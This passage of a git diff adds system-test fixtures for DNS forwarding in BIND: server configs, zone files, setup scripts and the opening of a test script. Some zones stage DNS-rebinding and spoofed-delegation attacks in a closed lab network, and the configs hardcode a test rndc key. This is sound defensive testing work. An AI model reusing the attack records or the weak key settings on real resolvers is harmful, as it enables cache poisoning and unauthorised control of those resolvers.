"named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; +}; + +zone "." { + type hint; + file "root.db"; +}; + +zone "example1." { + type primary; + file "example.db"; +}; + +zone "example2." { + type primary; + file "example.db"; +}; + +zone "example3." { + type primary; + file "example.db"; +}; + +zone "example4." { + type primary; + file "example.db"; +}; + +zone "example7." { + type primary; + file "example.db"; +}; + +zone "grafted." { + type primary; + file "example.db"; +}; + +zone "1.0.10.in-addr.arpa." { + type primary; + file "example.db"; +}; + +zone "tld" { + type primary; + file "tld.db"; +}; diff --git a/bin/tests/system/forward/ns2/root.db b/bin/tests/system/forward/ns2/root.db new file mode 100644 index 0000000..7108723 --- /dev/null +++ b/bin/tests/system/forward/ns2/root.db @@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example1 NS ns.example1 +ns.example1 A 10.53.0.1 + +example2 NS ns.example2 +ns.example2 A 10.53.0.1 + +example3 NS ns.example3 +ns.example3 A 10.53.0.1 diff --git a/bin/tests/system/forward/ns2/tld.db b/bin/tests/system/forward/ns2/tld.db new file mode 100644 index 0000000..965f2a4 --- /dev/null +++ b/bin/tests/system/forward/ns2/tld.db @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.2 +sld NS ns.sld +ns.sld A 10.53.0.1 +local NS ns.local +ns.local A 10.53.0.9 +sibling NS ns.sibling +ns.sibling A 10.53.0.4 +sibling NS ns.sub.local +ns.sub.local A 10.53.0.10 diff --git a/bin/tests/system/forward/ns3/named1.conf.in b/bin/tests/system/forward/ns3/named1.conf.in new file mode 100644 index 0000000..88f1eee --- /dev/null +++ b/bin/tests/system/forward/ns3/named1.conf.in @@ -0,0 +1,66 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + query-source-v6 address fd92:7065:b8e:ffff::3; + notify-source 10.53.0.3; + notify-source-v6 fd92:7065:b8e:ffff::3; + transfer-source 10.53.0.3; + transfer-source-v6 fd92:7065:b8e:ffff::3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { fd92:7065:b8e:ffff::3; }; + forwarders { fd92:7065:b8e:ffff::2; }; + forward first; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "root.db"; +}; + +zone "example1." { + type forward; + forward first; + forwarders { 10.53.0.2; }; +}; + +zone "example2." { + type forward; + forward first; + forwarders { }; +}; + +zone "example3." { + type forward; + forward only; + forwarders { }; +}; + +zone "example7." { + type forward; + forward first; + forwarders { 10.53.0.6; }; +}; diff --git a/bin/tests/system/forward/ns3/named2.conf.in b/bin/tests/system/forward/ns3/named2.conf.in new file mode 100644 index 0000000..b498e87 --- /dev/null +++ b/bin/tests/system/forward/ns3/named2.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + query-source-v6 address fd92:7065:b8e:ffff::3; + notify-source 10.53.0.3; + notify-source-v6 fd92:7065:b8e:ffff::3; + transfer-source 10.53.0.3; + transfer-source-v6 fd92:7065:b8e:ffff::3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { fd92:7065:b8e:ffff::3; }; + forwarders { 10.53.0.6; }; + dnssec-validation yes; +}; + +include "trusted.conf"; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "root.db"; +}; diff --git a/bin/tests/system/forward/ns3/root.db b/bin/tests/system/forward/ns3/root.db new file mode 100644 index 0000000..7108723 --- /dev/null +++ b/bin/tests/system/forward/ns3/root.db @@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example1 NS ns.example1 +ns.example1 A 10.53.0.1 + +example2 NS ns.example2 +ns.example2 A 10.53.0.1 + +example3 NS ns.example3 +ns.example3 A 10.53.0.1 diff --git a/bin/tests/system/forward/ns4/malicious.db b/bin/tests/system/forward/ns4/malicious.db new file mode 100644 index 0000000..e4859c1 --- /dev/null +++ b/bin/tests/system/forward/ns4/malicious.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA malicious. admin.malicious. ( + 1 ; Serial + 604800 ; Refresh + 86400 ; Retry + 2419200 ; Expire + 86400 ) ; Negative Cache TTL + +@ IN NS ns + +ns IN A 10.53.0.4 + +target IN CNAME subdomain.rebind. diff --git a/bin/tests/system/forward/ns4/named.conf.in b/bin/tests/system/forward/ns4/named.conf.in new file mode 100644 index 0000000..c97823d --- /dev/null +++ b/bin/tests/system/forward/ns4/named.conf.in @@ -0,0 +1,69 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + minimal-responses yes; +}; + +zone "." { + type hint; + file "root.db"; +}; + +zone "example1." { + type forward; + forward first; + forwarders { 10.53.0.2; }; +}; + +zone "example3." { + type forward; + forwarders { 10.53.0.2; }; +}; + +zone "example5." { + type forward; + forward only; + forwarders { 10.53.0.2; }; +}; + +zone "1.0.10.in-addr.arpa" { + type forward; + forward only; + forwarders { 10.53.0.2; }; +}; + +zone "grafted" { + type forward; + forward only; + forwarders { 10.53.0.2; }; +}; + +zone "malicious." { + type primary; + file "malicious.db"; +}; + +zone "sibling.tld" { + type primary; + file "sibling.tld.db"; +}; diff --git a/bin/tests/system/forward/ns4/root.db b/bin/tests/system/forward/ns4/root.db new file mode 100644 index 0000000..7108723 --- /dev/null +++ b/bin/tests/system/forward/ns4/root.db @@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example1 NS ns.example1 +ns.example1 A 10.53.0.1 + +example2 NS ns.example2 +ns.example2 A 10.53.0.1 + +example3 NS ns.example3 +ns.example3 A 10.53.0.1 diff --git a/bin/tests/system/forward/ns4/sibling.tld.db b/bin/tests/system/forward/ns4/sibling.tld.db new file mode 100644 index 0000000..fe080ae --- /dev/null +++ b/bin/tests/system/forward/ns4/sibling.tld.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA malicious. admin.malicious. ( + 1 ; Serial + 604800 ; Refresh + 86400 ; Retry + 2419200 ; Expire + 86400 ) ; Negative Cache TTL + +@ IN NS ns + +ns IN A 10.53.0.4 diff --git a/bin/tests/system/forward/ns5/named.conf.in b/bin/tests/system/forward/ns5/named.conf.in new file mode 100644 index 0000000..024f49b --- /dev/null +++ b/bin/tests/system/forward/ns5/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + forward only; + forwarders { 10.53.0.4; }; + deny-answer-aliases { "rebind"; }; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "root.db"; +}; + +zone "rebind" { + type primary; + file "rebind.db"; +}; diff --git a/bin/tests/system/forward/ns5/rebind.db b/bin/tests/system/forward/ns5/rebind.db new file mode 100644 index 0000000..aed6c2e --- /dev/null +++ b/bin/tests/system/forward/ns5/rebind.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA rebind. admin.rebind. ( + 1 ; Serial + 604800 ; Refresh + 86400 ; Retry + 2419200 ; Expire + 86400 ) ; Negative Cache TTL + +@ IN NS ns + +ns IN A 10.53.0.5 + +subdomain IN A 10.53.0.1 diff --git a/bin/tests/system/forward/ns5/root.db b/bin/tests/system/forward/ns5/root.db new file mode 100644 index 0000000..7108723 --- /dev/null +++ b/bin/tests/system/forward/ns5/root.db @@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example1 NS ns.example1 +ns.example1 A 10.53.0.1 + +example2 NS ns.example2 +ns.example2 A 10.53.0.1 + +example3 NS ns.example3 +ns.example3 A 10.53.0.1 diff --git a/bin/tests/system/forward/ns7/named.conf.in b/bin/tests/system/forward/ns7/named.conf.in new file mode 100644 index 0000000..302bb55 --- /dev/null +++ b/bin/tests/system/forward/ns7/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; + forwarders { 10.53.0.4; }; + forward first; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "root.db"; +}; diff --git a/bin/tests/system/forward/ns7/root.db b/bin/tests/system/forward/ns7/root.db new file mode 100644 index 0000000..7108723 --- /dev/null +++ b/bin/tests/system/forward/ns7/root.db @@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example1 NS ns.example1 +ns.example1 A 10.53.0.1 + +example2 NS ns.example2 +ns.example2 A 10.53.0.1 + +example3 NS ns.example3 +ns.example3 A 10.53.0.1 diff --git a/bin/tests/system/forward/ns8/named.conf.in b/bin/tests/system/forward/ns8/named.conf.in new file mode 100644 index 0000000..2de656f --- /dev/null +++ b/bin/tests/system/forward/ns8/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.8; + notify-source 10.53.0.8; + transfer-source 10.53.0.8; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.8; }; + listen-on-v6 { none; }; + forwarders { 10.53.0.2; }; // returns referrals + forward first; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "root.db"; +}; + +zone "sub.local.tld" { + type primary; + file "sub.local.tld.db"; +}; diff --git a/bin/tests/system/forward/ns8/root.db b/bin/tests/system/forward/ns8/root.db new file mode 100644 index 0000000..2cbdff5 --- /dev/null +++ b/bin/tests/system/forward/ns8/root.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 diff --git a/bin/tests/system/forward/ns8/sub.local.tld.db b/bin/tests/system/forward/ns8/sub.local.tld.db new file mode 100644 index 0000000..f2234c7 --- /dev/null +++ b/bin/tests/system/forward/ns8/sub.local.tld.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +sub.local.tld. 3600 IN SOA . . 0 0 0 0 0 +sub.local.tld. 3600 IN NS ns.sub.local.tld. +sub.local.tld. 3600 IN TXT good +ns.sub.local.tld. 3600 IN A 10.53.0.8 diff --git a/bin/tests/system/forward/ns9/local.net.db b/bin/tests/system/forward/ns9/local.net.db new file mode 100644 index 0000000..af0d2a5 --- /dev/null +++ b/bin/tests/system/forward/ns9/local.net.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +local.net. 3600 IN SOA . . 0 0 0 0 0 +local.net. 3600 IN NS localhost. +ns.local.net. 3600 IN A 10.53.0.9 +txt.local.net. 3600 IN TXT "something in the local auth zone" +sub.local.net. 3600 IN NS ns.spoofed.net. ; attacker will try to override this diff --git a/bin/tests/system/forward/ns9/local.tld.db b/bin/tests/system/forward/ns9/local.tld.db new file mode 100644 index 0000000..876a913 --- /dev/null +++ b/bin/tests/system/forward/ns9/local.tld.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +local.tld. 3600 IN SOA . . 0 0 0 0 0 +local.tld. 3600 IN NS localhost. +sub.local.tld. 3600 IN NS ns.sub.local.tld. +ns.sub.local.tld. 3600 IN A 10.53.0.8 diff --git a/bin/tests/system/forward/ns9/named1.conf.in b/bin/tests/system/forward/ns9/named1.conf.in new file mode 100644 index 0000000..be9a438 --- /dev/null +++ b/bin/tests/system/forward/ns9/named1.conf.in @@ -0,0 +1,67 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.9; + notify-source 10.53.0.9; + transfer-source 10.53.0.9; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.9; }; + listen-on-v6 { none; }; + dnssec-validation no; + edns-udp-size 1232; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +server 10.53.0.10 { + edns no; +}; + +server 10.53.0.11 { + edns no; +}; + +zone "." { + type hint; + file "root.db"; +}; + +zone "attacksecuredomain.net." { + type forward; + forwarders { 10.53.0.10; }; +}; + +zone "attacksecuredomain.net2." { + type forward; + forwarders { 10.53.0.10; }; +}; + +zone "attacksecuredomain.net3." { + type forward; + forwarders { 10.53.0.11; }; +}; + +zone "local.net." { + type primary; + file "local.net.db"; + forwarders {}; +}; diff --git a/bin/tests/system/forward/ns9/named2.conf.in b/bin/tests/system/forward/ns9/named2.conf.in new file mode 100644 index 0000000..2c40b42 --- /dev/null +++ b/bin/tests/system/forward/ns9/named2.conf.in @@ -0,0 +1,70 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.9; + notify-source 10.53.0.9; + transfer-source 10.53.0.9; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.9; }; + listen-on-v6 { none; }; + dnssec-validation no; + edns-udp-size 1232; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +server 10.53.0.10 { + edns no; +}; + +server 10.53.0.11 { + edns no; +}; + +zone "." { + type hint; + file "root.db"; +}; + +zone "attacksecuredomain.net." { + type forward; + forward only; + forwarders { 10.53.0.10; }; +}; + +zone "attacksecuredomain.net2." { + type forward; + forward only; + forwarders { 10.53.0.10; }; +}; + +zone "attacksecuredomain.net3." { + type forward; + forward only; + forwarders { 10.53.0.11; }; +}; + +zone "local.net." { + type primary; + file "local.net.db"; + forwarders {}; +}; diff --git a/bin/tests/system/forward/ns9/named3.conf.in b/bin/tests/system/forward/ns9/named3.conf.in new file mode 100644 index 0000000..576f57c --- /dev/null +++ b/bin/tests/system/forward/ns9/named3.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.9; + notify-source 10.53.0.9; + transfer-source 10.53.0.9; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.9; }; + listen-on-v6 { none; }; + dnssec-validation no; + edns-udp-size 1232; + forward only; + forwarders { 10.53.0.10; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +server 10.53.0.10 { + edns no; +}; + +zone "." { + type hint; + file "root.db"; +}; + +zone "local.net." { + type primary; + file "local.net.db"; + forwarders {}; +}; diff --git a/bin/tests/system/forward/ns9/named4.conf.in b/bin/tests/system/forward/ns9/named4.conf.in new file mode 100644 index 0000000..5cd7d84 --- /dev/null +++ b/bin/tests/system/forward/ns9/named4.conf.in @@ -0,0 +1,47 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.9; + notify-source 10.53.0.9; + transfer-source 10.53.0.9; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.9; }; + listen-on-v6 { none; }; + dnssec-validation no; + edns-udp-size 1232; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +server 10.53.0.10 { + edns no; +}; + +zone "." { + type hint; + file "root.db"; +}; + +zone "local.tld." { + type primary; + file "local.tld.db"; +}; diff --git a/bin/tests/system/forward/ns9/root.db b/bin/tests/system/forward/ns9/root.db new file mode 100644 index 0000000..2cbdff5 --- /dev/null +++ b/bin/tests/system/forward/ns9/root.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 diff --git a/bin/tests/system/forward/prereq.sh b/bin/tests/system/forward/prereq.sh new file mode 100644 index 0000000..2f5a187 --- /dev/null +++ b/bin/tests/system/forward/prereq.sh @@ -0,0 +1,37 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + : +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi + +if test -n "$PYTHON" +then + if $PYTHON -c "import dns" 2> /dev/null + then + : + else + echo_i "This test requires the dnspython module." >&2 + exit 1 + fi +else + echo_i "This test requires Python and the dnspython module." >&2 + exit 1 +fi diff --git a/bin/tests/system/forward/rfc1918-inherited.conf b/bin/tests/system/forward/rfc1918-inherited.conf new file mode 100644 index 0000000..66569dc --- /dev/null +++ b/bin/tests/system/forward/rfc1918-inherited.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone 10.in-addr.arpa { + type forward; + forwarders { 1.2.3.4; }; +}; diff --git a/bin/tests/system/forward/rfc1918-notinherited.conf b/bin/tests/system/forward/rfc1918-notinherited.conf new file mode 100644 index 0000000..d6d5c2d --- /dev/null +++ b/bin/tests/system/forward/rfc1918-notinherited.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone 10.in-addr.arpa { + type forward; + forward first; + forwarders { 1.2.3.4; }; +}; diff --git a/bin/tests/system/forward/setup.sh b/bin/tests/system/forward/setup.sh new file mode 100644 index 0000000..589f983 --- /dev/null +++ b/bin/tests/system/forward/setup.sh @@ -0,0 +1,30 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +. "$SYSTEMTESTTOP/conf.sh" + +$SHELL clean.sh +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named1.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns7/named.conf.in ns7/named.conf +copy_setports ns8/named.conf.in ns8/named.conf +copy_setports ns9/named1.conf.in ns9/named.conf +copy_setports ns10/named.conf.in ns10/named.conf + +( + cd ns1 + $SHELL sign.sh +) diff --git a/bin/tests/system/forward/tests.sh b/bin/tests/system/forward/tests.sh new file mode 100644 index 0000000..4b3a1ab --- /dev/null +++ b/bin/tests/system/forward/tests.sh @@ -0,0 +1,383 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +#shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +dig_with_opts() ( + "$DIG" -p "$PORT" "$@" +) + +sendcmd() ( + "$PERL" ../send.pl 10.53.0.6 "$EXTRAPORT1" +) + +rndccmd() { + "$RNDC" -c ../common/rndc.conf -p "$CONTROLPORT" -s "$@" +} + +root=10.53.0.1 +hidden=10.53.0.2 +f1=10.53.0.3 